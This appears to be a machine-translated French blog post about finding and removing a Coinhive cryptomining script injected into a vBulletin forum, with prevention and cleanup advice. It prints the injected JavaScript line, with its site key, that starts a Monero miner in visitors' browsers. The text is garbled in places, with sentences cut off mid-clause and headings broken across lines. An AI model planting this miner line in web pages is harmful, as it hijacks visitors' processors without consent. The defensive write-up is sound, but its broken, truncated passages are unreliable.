Comment supprimer le script crypto-mining de Coinhive depuis votre site web

Je visite habituellement le forum tous les jours et je ne l`avais pas vu la veille. Donc, je suppose que cela s`est passé quelque temps pendant la nuit, mon temps, quand je dormais.

J`utilise le logiciel vBulletin pour le forum, et il a été mis à jour à la dernière version. En outre, cela a été assez surprenant pour nous, car le domaine TheWindowsClub.com utilise Sucuri Web Antivirus & Firewall pour se protéger des attaques et des menaces Web en ligne.

Mon logiciel de sécurité PC a arrêté le script malveillant sur mon ordinateur Windows 10. J`ai vérifié avec d`autres navigateurs comme Chrome & Edge, et les résultats étaient les mêmes.

Après avoir cliqué droit sur la page web du forum et vérifié le code source, j`ai trouvé que c`était un script CryptoMiner de CoinHive. Voici le Javascript malveillant de Coinhive qui était entré dans mon code de forum:

var mineur = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); mineur.start ();

Quoi qu`il en soit, la première chose que j`ai faite a été de

Les Sucuri nettoyaient le forum du scénario de Coinhive qui avait été poussé dans mon forum en quelques heures, et tout

allait bien Qu`est-ce que CoinHive

? un mineur de JavaScript pour la crypto-monnaie Monero que vous pouvez intégrer dans votre site Web et utiliser les ordinateurs des visiteurs du site Web pour extraire des pièces pour vous.

Ceci s`appelle

Cryptojacking . Il s`agit de détourner les navigateurs des utilisateurs pour l`extraction de crypto-monnaie. Certains propriétaires de sites Web peuvent l`utiliser eux-mêmes pour gagner de l`argent - mais dans notre cas, il a été injecté. Lorsqu`un utilisateur accède au site infecté, Coinhive JavaScript exécute et exploite Monero en utilisant les ressources du processeur de l`utilisateur. Cela peut entraîner une limitation de l`UC et une panne inattendue du système de la machine de la victime.

Maintenant, si votre navigateur est infecté, votre utilisation des ressources augmentera. Fermez le navigateur, et il va tomber. l`utilisateur peut remarquer que sa machine chauffe, que le ventilateur tourne vite ou que la batterie se décharge rapidement.

J`ai demandé à mon collègue Saurabh Mukhekar de visiter mon forum en utilisant son

Mac et de voir ce qui s`est passé. Eh bien, son ordinateur Mac a été affecté aussi quand il a ouvert le forum avec Safari! Il est l`un de ces utilisateurs intelligents de Mac OSX qui utilise un logiciel antivirus pour son Mac. Son antivirus Avast pour Mac a réussi à stopper le script malveillant. Said Saurabh,

Non seulement le malware CoinHive détourne un PC Windows, mais aussi le Mac, car il s`agit d`une infection Javascript par navigateur. Il est bon de ne pas croire que les Mac n`ont pas besoin d`un logiciel antivirus, sinon ma machine aurait été infectée et mon Mac aurait continué à produire des pièces pour quelqu`un d`autre.

Empêchez CoinHive d`infecter votre site

n`utilisez pas de modèles ou de plugins NULL sur votre site / forum

1. Gardez votre CMS à jour avec la dernière version.
2. Mettez régulièrement à jour votre logiciel d`hébergement (PHP, Base de données, etc …)
3. Sécurisez votre site avec des fournisseurs de sécurité Web comme Sucuri, Cloudflare, Wordfence, etc.
4. Prenez les précautions de base pour sécuriser votre blog
5. CoinHive mineur enlèvement du site

Tout d`abord, vous devez être le webmaster du

Maintenant que votre antivirus détecte l`infection CoinHive, cliquez avec le bouton droit de la souris sur la page Web et sélectionnez

Afficher le code source. Ensuite, appuyez sur Ctrl + F et recherchez "CoinHive". Une fois que vous avez identifié l`emplacement du code malveillant, vous devez voir sa position - où se trouve-t-il. Maintenant, vous devez le supprimer manuellement. Pour ce faire, vous avez besoin d`un peu de connaissances en codage de votre plateforme. Vous devrez localiser le ou les fichiers infectés et supprimer manuellement le script ci-dessus. Si vous n`êtes pas sûr, demandez à un expert de le faire. Puisque nous utilisons Sucuri, nous les laissons faire.

Ayant fait cela, effacez le cache de votre serveur et de votre navigateur. Si vous utilisez un plugin de cache ou que vous dites MaxCDN, effacez aussi ces caches

Protégez-vous contre les scripts d`extraction de crypto

La technologie Cryptocurrencies & Blockchain prend le dessus. Cela crée un impact sur l`économie mondiale et entraîne également des perturbations technologiques. Tout le monde a commencé à se concentrer sur un marché aussi lucratif - et cela inclut aussi les pirates informatiques. À mesure que les rendements augmentent, nous devrions nous attendre à ce que ces technologies soient mal utilisées. c`est le côté sombre de toute technologie émergente.

Ce que nous pouvons faire est de prendre les meilleures précautions possibles en tout temps. En plus d`utiliser un bon logiciel de sécurité, utilisez une extension Chrome ou Firefox qui bloque les sites Web en utilisant votre processeur pour exploiter Crypto-monnaie - ou mieux, utilisez Anti-WebMiner qui va arrêter les attaques Cryptojacking Mining Script en modifiant votre fichier Hosts. Cela fonctionne sur tous les navigateurs. Si vous êtes un utilisateur Mac, procurez-vous également un antivirus pour votre ordinateur.

Par précaution, si vous pensez avoir visité un site infecté, il serait judicieux de vider votre navigateur Cachez et analysez votre machine avec votre logiciel antivirus et AdwCleaner.

Restez en sécurité, restez vigilant!